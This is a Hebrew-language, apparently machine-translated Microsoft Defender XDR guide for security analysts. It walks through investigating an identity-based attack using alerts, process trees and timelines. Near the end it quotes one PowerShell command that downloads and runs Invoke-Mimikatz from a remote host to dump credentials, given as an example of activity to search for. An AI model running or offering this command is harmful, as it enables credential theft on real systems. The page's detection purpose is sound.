שתף באמצעות


דוגמה לתקיפה מבוססת זהות

חל על:

  • Microsoft Defender XDR

Microsoft Defender עבור זהות לעזור לזהות ניסיונות זדוניים לסכן זהויות בארגון שלך. מאחר ש- Defender for Identity משתלב עם Microsoft Defender XDR, אנליסטי אבטחה יכולים לראות איומים שמגיעים מ- Defender for Identity, כגון ניסיונות העלאת רמת הרשאה חשודה של Netlogon.

מנתח את ההתקפה Microsoft Defender עבור זהות

Microsoft Defender XDR מאפשר לאנליסטים לסנן התראות על-ידי מקור זיהוי בכרטיסיה התראות של דף האירועים. בדוגמה הבאה, מקור הזיהוי מסונן ל- Defender for Identity.

סינון מקור הזיהוי ב- Microsoft Defender עבור זהות

בחירת ההתראה של תקיפה חשודה באמצעות חלף-the-hash עוברת לדף ב- יישומי ענן של Microsoft Defender שמציג מידע מפורט יותר. תמיד תוכל לקבל מידע נוסף על התראה או תקיפה על-ידי בחירה באפשרות קבל מידע נוסף אודות סוג התראה זה כדי לקרוא תיאור של הצעות התקיפה והתיקון.

התראת תקיפה חשודה של מעבר-על-האש

חוקר את אותה התקפה Microsoft Defender עבור נקודת קצה

לחלופין, אנליסט יכול להשתמש ב- Defender for Endpoint כדי לקבל מידע נוסף על הפעילות ב נקודת קצה. בחר את המקרה מתור האירועים ולאחר מכן בחר את הכרטיסיה התראות. מכאן, הם יוכלו לזהות גם את מקור הזיהוי. מקור זיהוי עם התווית EDR הוא ראשי התווית עבור זיהוי נקודות קצה ותגובה, שהוא Defender for Endpoint. מכאן, אנליסט בוחר התראה שזוהתה על-ידי EDR.

זיהוי נקודת קצה ותגובה בפורטל Microsoft Defender עבור נקודת קצה שלך

דף ההתראה מציג מידע רלוונטי שונה כגון שם המכשיר המושפע, שם המשתמש, מצב החקירה האוטומטית ופרטי ההתראה. סיפור ההתראה מתאר ייצוג חזותי של עץ התהליך. עץ התהליך הוא ייצוג הירארכי של תהליכי אב וצאצא הקשורים להתראה.

עץ תהליך של התראה Microsoft Defender עבור נקודת קצה

ניתן להרחיב כל תהליך כדי להציג פרטים נוספים. פרטים שמנתח יכול לראות הם הפקודות בפועל שהוזנו כחלק מקובץ Script זדוני, כתובות IP של חיבורים יוצאים ומידע שימושי אחר.

פרטי התהליך בפורטל Microsoft Defender עבור נקודת קצה שלך

על-ידי בחירה באפשרות ראה בציר הזמן, אנליסט יכול לבצע הסתעפות נוספת כדי לקבוע את הזמן המדויק של הפשרה.

Microsoft Defender עבור נקודת קצה לזהות קבצי Script וקבצים זדוניים רבים. עם זאת, עקב שימושים חוקיים רבים עבור חיבורים יוצאים, PowerShell ופעילות שורת פקודה, פעילות מסוימת תיחשב לברכה עד שהיא תיצור קובץ או פעילות זדוניים. לכן, שימוש בציר הזמן עוזר לאנליסטים להכניס את ההתראה להקשר עם הפעילות המקיפים כדי לקבוע את המקור או השעה המקוריים של ההתקפה, אשר אחרת מונעת על-ידי מערכת קבצים משותפת ופעילות משתמשים.

כדי להשתמש בציר הזמן, אנליסט יתחיל בזמן של זיהוי ההתראות (באדום) וינגלל מטה בזמן כדי לקבוע מתי הפעילות המקורית שהובילה לפעילות הזדון התחילה בפועל.

זמן ההתחלה של האנליסטים עבור זיהוי ההתראות

חשוב להבין ולהבחין בין פעילות נפוצה כגון חיבורי Windows Update, תעבורת הפעלת תוכנה מהימנה של Windows, חיבורים נפוצים אחרים לאתרי Microsoft, פעילות אינטרנט של ספקים חיצוניים, פעילות של נקודת קצה של Microsoft Configuration Manager ופעילות טובה אחרת של פעילות חשודה. דרך אחת להבחין היא באמצעות מסנני ציר זמן. קיימים מסננים רבים שעלולים להדגיש פעילות ספציפית בעת סינון כל דבר שהאנליסט אינו מעוניין להציג.

בתמונה שלהלן, אנליסט מסונן כדי להציג אירועי רשת ותהליך בלבד. קריטריוני סינון אלה מאפשרים לאנליסט לראות את חיבורי הרשת ואת התהליכים המקיפים את האירוע שבו 'פנקס רשימות' הקים חיבור לכתובת IP, אשר ראינו גם בעץ התהליך.

כיצד נעשה שימוש ב'פנקס רשימות' ליצירת חיבור יוצא זדוני

באירוע מסוים זה, 'פנקס רשימות' שימש ליצירת חיבור יוצא זדוני. עם זאת, לעתים קרובות תוקפים ישתמשו iexplorer.exe כדי ליצור חיבורים להורדת תוכן מנה זדוני מכיוון שתהליכים זדוניים בדרך כלל iexplorer.exe נחשבים לפעילות רגילה של דפדפן אינטרנט.

פריט אחר שיש לחפש בציר הזמן יהיה שימוש ב- PowerShell עבור חיבורים יוצאים. האנליסטים יחפש חיבורי PowerShell IEX (New-Object Net.Webclient) מוצלחים עם פקודות כגון חיבור יוצא לאתר אינטרנט המארח קובץ זדוני.

בדוגמה הבאה, PowerShell שימש להורדה ולביצוע של מימיקאץ מאתר אינטרנט:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

אנליסט יכול לחפש במהירות מילות מפתח על-ידי הקלדה במילת המפתח בסרגל החיפוש כדי להציג רק אירועים שנוצרו באמצעות PowerShell.

השלב הבא

ראה את נתיב חקירת דיוג .

למידע נוסף

עצה

האם ברצונך לקבל מידע נוסף? צור קשר עם קהילת האבטחה של Microsoft בקהילת הטכנולוגיה שלנו: קהילת האבטחה של Microsoft Defender XDR.